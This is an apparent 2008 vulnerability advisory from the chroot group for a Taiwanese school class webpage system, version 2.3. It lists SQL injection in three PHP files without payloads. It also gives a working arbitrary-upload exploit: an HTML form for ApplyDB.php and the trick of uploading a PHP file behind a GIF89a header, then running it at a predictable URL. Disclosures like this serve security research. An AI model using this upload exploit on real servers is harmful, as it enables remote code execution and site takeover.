_ _ _ _____ ____ ____ __ _
Hacks In Taiwan | |_| | |_ _| __| | \| |
Conference 2008 | _ | | | | | (__| () | |
|_| |_|_| |_| \____|____|_|\__|
http://www.hitcon.org
Title :: Class System v2.3 Multiple Remote Vulnerabilities
Author :: unohope [at] chroot [dot] org
IRC :: irc.chroot.org #chroot
ScriptName :: 班級網頁管理系統 v2.3
Download :: http://netlab.kh.edu.tw/download/classman/ClassSystemV2.zip
http://netlab.kh.edu.tw/download/classman/ClassSystemV2.3.zip
Mirror :: http://www.badongo.com/file/9542454
http://www.badongo.com/file/9542460
_______________
[SQL Injection]
- {HomepageTop.php} -
- {HomepageMani.php} -
- {MessageReply.php} -
____________________
[Upload Arbitrarily]
- {Apply.php} -
<form enctype="multipart/form-data" action="http://localhost/class/ApplyDB.php" method="post">
<input type="hidden" name="teacher_account" value="blah1">
<input type="hidden" name="teacher_password" value="blah1">
<input type="file" name="uploadfile" size="40"><br>
<input type="submit" value="send">
</form>
Just upload a foo.php with GIF89a header, and go to url as following ..
http://localhost/class/UploadHomepage/[your_account_id]_1.php
then enjoy it ..
______
[NOTE]
!! This is just for educational purposes, DO NOT use for illegal. !!
# 2008/5/24 - chrO.ot group #